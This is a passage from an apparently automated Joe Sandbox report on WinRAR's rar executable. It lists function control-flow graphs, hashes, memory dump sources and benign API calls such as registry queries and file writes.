                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: wcschr
                                                                                                                                                                                                                              • String ID: .part$.rar$.rar$AFUMD$FUADPXETK$stdin
                                                                                                                                                                                                                              • API String ID: 1497570035-1281034975
                                                                                                                                                                                                                              • Opcode ID: 43ddd1800645f40e7e0ad877604b3aadd6ee3f0a81332a219ef4bf9da79026d2
                                                                                                                                                                                                                              • Instruction ID: e2bf175498de450bdbd3916c7eea4413e0b0c851167e7f2d0638573c66a5bca8
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 43ddd1800645f40e7e0ad877604b3aadd6ee3f0a81332a219ef4bf9da79026d2
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4DC16161A18AC244EA64BF25C8551FC93D1EF46BA4FC44135EA4E4E6DADE2CF721E330

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 1564 7ff7cf8c7f24-7ff7cf8c7f5c 1565 7ff7cf8c7fd0 1564->1565 1566 7ff7cf8c7f5e-7ff7cf8c7f64 1564->1566 1567 7ff7cf8c7fd7-7ff7cf8c7fea 1565->1567 1566->1565 1568 7ff7cf8c7f66-7ff7cf8c7f7c call 7ff7cf8cb3f0 1566->1568 1569 7ff7cf8c8036-7ff7cf8c8039 1567->1569 1570 7ff7cf8c7fec-7ff7cf8c7fef 1567->1570 1576 7ff7cf8c7fb5 1568->1576 1577 7ff7cf8c7f7e-7ff7cf8c7fb3 GetProcAddressForCaller GetProcAddress 1568->1577 1573 7ff7cf8c805c-7ff7cf8c8065 GetCurrentProcessId 1569->1573 1574 7ff7cf8c803b-7ff7cf8c804a 1569->1574 1570->1573 1575 7ff7cf8c7ff1-7ff7cf8c8000 1570->1575 1578 7ff7cf8c8077-7ff7cf8c8093 1573->1578 1579 7ff7cf8c8067 1573->1579 1584 7ff7cf8c804f-7ff7cf8c8051 1574->1584 1585 7ff7cf8c8005-7ff7cf8c8007 1575->1585 1580 7ff7cf8c7fbc-7ff7cf8c7fce 1576->1580 1577->1580 1583 7ff7cf8c8069-7ff7cf8c8075 1579->1583 1580->1567 1583->1578 1583->1583 1584->1578 1586 7ff7cf8c8053-7ff7cf8c805a 1584->1586 1585->1578 1587 7ff7cf8c8009 1585->1587 1588 7ff7cf8c8010-7ff7cf8c8034 call 7ff7cf89ca6c call 7ff7cf89cda4 call 7ff7cf89ca40 1586->1588 1587->1588 1588->1578
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressProc$CallerCurrentDirectoryProcessSystem
                                                                                                                                                                                                                              • String ID: Crypt32.dll$CryptProtectMemory$CryptProtectMemory failed$CryptUnprotectMemory$CryptUnprotectMemory failed
                                                                                                                                                                                                                              • API String ID: 1389829785-2207617598
                                                                                                                                                                                                                              • Opcode ID: 55f9cc654a4765269b34be058e69e02607cbee85ebbaa2d255acd8e9286e0d92
                                                                                                                                                                                                                              • Instruction ID: 6d5bbe94fc7b5f3542f14a67d800e2dd358a72238af64d91bebdc1eec130a46a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 55f9cc654a4765269b34be058e69e02607cbee85ebbaa2d255acd8e9286e0d92
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DC412821A08BC285EE05AF12AC405B9E7A1BB59BF4FCA1131CD6D07798DE7DE461A330

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionFilterPresentUnhandled__scrt_fastfail__scrt_is_nonwritable_in_current_image$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual__isa_available_init__scrt_acquire_startup_lock__scrt_initialize_crt__scrt_is_managed_app__scrt_release_startup_lock__scrt_uninitialize_crt__vcrt_initialize
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 552178382-0
                                                                                                                                                                                                                              • Opcode ID: 9c665b31eb0b804363cbc587f94f2e5aa54598bfa8fc207139a92aecf1914098
                                                                                                                                                                                                                              • Instruction ID: d6736e78df24275073fff077a7230fe7a12bd1e749fb1f9fbaa8afed7513386b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9c665b31eb0b804363cbc587f94f2e5aa54598bfa8fc207139a92aecf1914098
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4C314C25E082C385EE14BF65A9113F9A3D1AF55BA4FC42036DA0D47297DF6CE424A370

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • RegOpenKeyExW.KERNELBASE(?,?,?,?,?,00007FF7CF8C495D,?,?,?,00007FF7CF8B7E7D), ref: 00007FF7CF8C47DB
                                                                                                                                                                                                                              • RegQueryValueExW.ADVAPI32(?,?,?,?,?,00007FF7CF8C495D,?,?,?,00007FF7CF8B7E7D), ref: 00007FF7CF8C4831
                                                                                                                                                                                                                              • ExpandEnvironmentStringsW.KERNEL32(?,?,?,?,?,00007FF7CF8C495D,?,?,?,00007FF7CF8B7E7D), ref: 00007FF7CF8C4853
                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,00007FF7CF8C495D,?,?,?,00007FF7CF8B7E7D), ref: 00007FF7CF8C48A6
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CloseEnvironmentExpandOpenQueryStringsValue
                                                                                                                                                                                                                              • String ID: LanguageFolder$Software\WinRAR\General
                                                                                                                                                                                                                              • API String ID: 1800380464-3408810217
                                                                                                                                                                                                                              • Opcode ID: df8e8945b6f074808e1d136ded68da0d597e77b5ffd7a0622e633ce0ea7293c4
                                                                                                                                                                                                                              • Instruction ID: a2df0782dacc9858d90314f9185df1910113eb4fc934c19eaaf59b086c2c7cae
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: df8e8945b6f074808e1d136ded68da0d597e77b5ffd7a0622e633ce0ea7293c4
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A131C722718AC585EB50EF21E8142F9A3A0FF847B4F804231EE4D47B99EF6CD154D720

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • RegOpenKeyExW.KERNELBASE(?,?,?,?,00000800,00000000,00000000,00007FF7CF8B38CB,?,?,?,00007FF7CF8B41EC), ref: 00007FF7CF8B43D1
                                                                                                                                                                                                                              • RegQueryValueExW.ADVAPI32(?,?,?,?,00000800,00000000,00000000,00007FF7CF8B38CB,?,?,?,00007FF7CF8B41EC), ref: 00007FF7CF8B4402
                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,00000800,00000000,00000000,00007FF7CF8B38CB,?,?,?,00007FF7CF8B41EC), ref: 00007FF7CF8B440D
                                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(?,?,?,?,00000800,00000000,00000000,00007FF7CF8B38CB,?,?,?,00007FF7CF8B41EC), ref: 00007FF7CF8B443E
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CloseFileModuleNameOpenQueryValue
                                                                                                                                                                                                                              • String ID: AppData$Software\WinRAR\Paths
                                                                                                                                                                                                                              • API String ID: 3617018055-3415417297
                                                                                                                                                                                                                              • Opcode ID: 070cc4d0cc6b07d111a1af4e028d2b6750b797b38322b9f578af6c992b8e5665
                                                                                                                                                                                                                              • Instruction ID: 4081c4fb2f4cd11928493e8b26018387cefa7ced96e0888b94b4fee59f312c50
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 070cc4d0cc6b07d111a1af4e028d2b6750b797b38322b9f578af6c992b8e5665
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1D116332A1878289EF10AF25A8015EAB3A0FF94BE4F845131EE4E07699DF3CD064D730

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 1715 7ff7cf887a5b-7ff7cf887a5e 1716 7ff7cf887a68 1715->1716 1717 7ff7cf887a60-7ff7cf887a66 1715->1717 1718 7ff7cf887a6b-7ff7cf887a7c 1716->1718 1717->1716 1717->1718 1719 7ff7cf887a7e-7ff7cf887a81 1718->1719 1720 7ff7cf887aa8 1718->1720 1721 7ff7cf887a88-7ff7cf887a8b 1719->1721 1722 7ff7cf887a83-7ff7cf887a86 1719->1722 1723 7ff7cf887aab-7ff7cf887ab8 1720->1723 1724 7ff7cf887a8d-7ff7cf887a90 1721->1724 1725 7ff7cf887aa4-7ff7cf887aa6 1721->1725 1722->1720 1722->1721 1726 7ff7cf887aba-7ff7cf887abd 1723->1726 1727 7ff7cf887ac8-7ff7cf887acb 1723->1727 1724->1720 1728 7ff7cf887a92-7ff7cf887a99 1724->1728 1725->1723 1726->1727 1729 7ff7cf887abf-7ff7cf887ac6 1726->1729 1730 7ff7cf887acf-7ff7cf887ad1 1727->1730 1728->1725 1731 7ff7cf887a9b-7ff7cf887aa2 1728->1731 1729->1730 1732 7ff7cf887b2a-7ff7cf887bb0 call 7ff7cf8a1d34 call 7ff7cf883f04 1730->1732 1733 7ff7cf887ad3-7ff7cf887ae6 1730->1733 1731->1720 1731->1725 1744 7ff7cf887bbc 1732->1744 1745 7ff7cf887bb2-7ff7cf887bba 1732->1745 1735 7ff7cf887b0a-7ff7cf887b27 1733->1735 1736 7ff7cf887ae8-7ff7cf887af2 call 7ff7cf899be0 1733->1736 1735->1732 1739 7ff7cf887af7-7ff7cf887b02 1736->1739 1739->1735 1746 7ff7cf887bbf-7ff7cf887bc9 1744->1746 1745->1744 1745->1746 1747 7ff7cf887bcb-7ff7cf887bd5 call 7ff7cf8a1e1c 1746->1747 1748 7ff7cf887bda-7ff7cf887c06 call 7ff7cf88b540 1746->1748 1747->1748 1752 7ff7cf887c08-7ff7cf887c0f 1748->1752 1753 7ff7cf887c40 1748->1753 1752->1753 1754 7ff7cf887c11-7ff7cf887c14 1752->1754 1755 7ff7cf887c44-7ff7cf887c5a call 7ff7cf88aa68 1753->1755 1754->1753 1756 7ff7cf887c16-7ff7cf887c2b 1754->1756 1761 7ff7cf887c5c-7ff7cf887c6a 1755->1761 1762 7ff7cf887c85-7ff7cf887c97 call 7ff7cf88b540 1755->1762 1756->1755 1758 7ff7cf887c2d-7ff7cf887c3e call 7ff7cf8d9b98 1756->1758 1758->1755 1761->1762 1765 7ff7cf887c6c-7ff7cf887c7e call 7ff7cf888d98 1761->1765 1766 7ff7cf887c9c-7ff7cf887c9f 1762->1766 1765->1762 1768 7ff7cf887ca5-7ff7cf887cfb call 7ff7cf8b9354 call 7ff7cf8a6378 * 2 1766->1768 1769 7ff7cf887fa4-7ff7cf887fbe 1766->1769 1777 7ff7cf887cfd-7ff7cf887d10 call 7ff7cf885414 1768->1777 1778 7ff7cf887d17-7ff7cf887d1f 1768->1778 1777->1778 1780 7ff7cf887d25-7ff7cf887d28 1778->1780 1781 7ff7cf887de2-7ff7cf887de6 1778->1781 1780->1781 1785 7ff7cf887d2e-7ff7cf887d36 1780->1785 1783 7ff7cf887e4e-7ff7cf887e68 call 7ff7cf8b9958 1781->1783 1784 7ff7cf887de8-7ff7cf887e49 call 7ff7cf8b98dc 1781->1784 1793 7ff7cf887e8b-7ff7cf887e8e 1783->1793 1794 7ff7cf887e6a-7ff7cf887e84 1783->1794 1784->1783 1786 7ff7cf887d59-7ff7cf887d6a call 7ff7cf8da444 1785->1786 1787 7ff7cf887d38-7ff7cf887d49 call 7ff7cf8da444 1785->1787 1801 7ff7cf887d6c-7ff7cf887d77 call 7ff7cf8acf8c 1786->1801 1802 7ff7cf887d78-7ff7cf887dc6 1786->1802 1799 7ff7cf887d4b-7ff7cf887d56 call 7ff7cf8a8ae8 1787->1799 1800 7ff7cf887d57 1787->1800 1797 7ff7cf887e90-7ff7cf887e9a call 7ff7cf8b9990 1793->1797 1798 7ff7cf887e9f-7ff7cf887eb8 call 7ff7cf881204 1793->1798 1794->1793 1797->1798 1813 7ff7cf887ec8-7ff7cf887ed9 call 7ff7cf8b941c 1798->1813 1799->1800 1800->1802 1801->1802 1802->1781 1823 7ff7cf887dc8-7ff7cf887de1 call 7ff7cf881314 call 7ff7cf8dba34 1802->1823 1817 7ff7cf887edb-7ff7cf887f9f call 7ff7cf881400 call 7ff7cf8a6424 call 7ff7cf88b540 1813->1817 1818 7ff7cf887eba-7ff7cf887ec3 call 7ff7cf8b9680 1813->1818 1817->1769 1818->1813 1823->1781
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: H9
                                                                                                                                                                                                                              • API String ID: 0-2207570329
                                                                                                                                                                                                                              • Opcode ID: bfe6fc976dbe33fdf4425640d4b10151a71b19a50d871be7ca308560478a8ca7
                                                                                                                                                                                                                              • Instruction ID: 58866079d9fc8e3f8dc9ddb3c33bae105e7367385606f34bb0a378f3b05c0140
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bfe6fc976dbe33fdf4425640d4b10151a71b19a50d871be7ca308560478a8ca7
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 23E1BD62A09AD285EB10EF25E488AFD63E9EB4579CF854531CE4D03786DF38E564E330

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 1858 7ff7cf8a2574-7ff7cf8a259c 1859 7ff7cf8a25a5-7ff7cf8a25a9 1858->1859 1860 7ff7cf8a259e-7ff7cf8a25a0 1858->1860 1862 7ff7cf8a25ba-7ff7cf8a25c6 1859->1862 1863 7ff7cf8a25ab-7ff7cf8a25b6 GetStdHandle 1859->1863 1861 7ff7cf8a273a-7ff7cf8a2756 1860->1861 1864 7ff7cf8a25c8-7ff7cf8a25cd 1862->1864 1865 7ff7cf8a2619-7ff7cf8a2637 WriteFile 1862->1865 1863->1862 1867 7ff7cf8a25cf-7ff7cf8a2609 WriteFile 1864->1867 1868 7ff7cf8a2644-7ff7cf8a2648 1864->1868 1866 7ff7cf8a263b-7ff7cf8a263e 1865->1866 1866->1868 1870 7ff7cf8a2733-7ff7cf8a2737 1866->1870 1867->1868 1869 7ff7cf8a260b-7ff7cf8a2615 1867->1869 1868->1870 1871 7ff7cf8a264e-7ff7cf8a2652 1868->1871 1869->1867 1872 7ff7cf8a2617 1869->1872 1870->1861 1871->1870 1873 7ff7cf8a2658-7ff7cf8a2692 GetLastError call 7ff7cf8a3144 SetLastError 1871->1873 1872->1866 1878 7ff7cf8a2694-7ff7cf8a26a2 1873->1878 1879 7ff7cf8a26bc-7ff7cf8a26d0 call 7ff7cf89c95c 1873->1879 1878->1879 1881 7ff7cf8a26a4-7ff7cf8a26ab 1878->1881 1885 7ff7cf8a26d2-7ff7cf8a26db 1879->1885 1886 7ff7cf8a2721-7ff7cf8a272e call 7ff7cf89cf14 1879->1886 1881->1879 1883 7ff7cf8a26ad-7ff7cf8a26b7 call 7ff7cf89cf34 1881->1883 1883->1879 1885->1862 1888 7ff7cf8a26e1-7ff7cf8a26e3 1885->1888 1886->1870 1888->1862 1889 7ff7cf8a26e9-7ff7cf8a271c 1888->1889 1889->1862
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorFileLastWrite$Handle
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3350704910-0
                                                                                                                                                                                                                              • Opcode ID: ccd0c3e83433efd0ca407849e79df603d5f0c90f747e6cdc6739dd31fcb0c28b
                                                                                                                                                                                                                              • Instruction ID: 57acc9d646a6c9050f1b0937ba2608ad9e3b6819976afaf5e29cda44b7d29b64
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ccd0c3e83433efd0ca407849e79df603d5f0c90f747e6cdc6739dd31fcb0c28b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6F51942660968287EB64EF25E4143BAE3E0FB45B64F840135DA4E46690CF3CE565D730

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 1894 7ff7cf8a1e80-7ff7cf8a1ebb call 7ff7cf8da5a0 1897 7ff7cf8a1ec8 1894->1897 1898 7ff7cf8a1ebd-7ff7cf8a1ec1 1894->1898 1900 7ff7cf8a1ecb-7ff7cf8a1f57 CreateFileW 1897->1900 1898->1897 1899 7ff7cf8a1ec3-7ff7cf8a1ec6 1898->1899 1899->1900 1901 7ff7cf8a1f59-7ff7cf8a1f76 GetLastError call 7ff7cf8b4534 1900->1901 1902 7ff7cf8a1fcd-7ff7cf8a1fd1 1900->1902 1912 7ff7cf8a1f78-7ff7cf8a1fb6 CreateFileW GetLastError 1901->1912 1913 7ff7cf8a1fba 1901->1913 1903 7ff7cf8a1fd3-7ff7cf8a1fd7 1902->1903 1904 7ff7cf8a1ff7-7ff7cf8a200f 1902->1904 1903->1904 1906 7ff7cf8a1fd9-7ff7cf8a1ff1 SetFileTime 1903->1906 1907 7ff7cf8a2011-7ff7cf8a2022 call 7ff7cf8ca9e8 1904->1907 1908 7ff7cf8a2027-7ff7cf8a204b call 7ff7cf8da610 1904->1908 1906->1904 1907->1908 1912->1902 1915 7ff7cf8a1fb8 1912->1915 1916 7ff7cf8a1fbf-7ff7cf8a1fc1 1913->1916 1915->1916 1916->1902 1917 7ff7cf8a1fc3 1916->1917 1917->1902
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
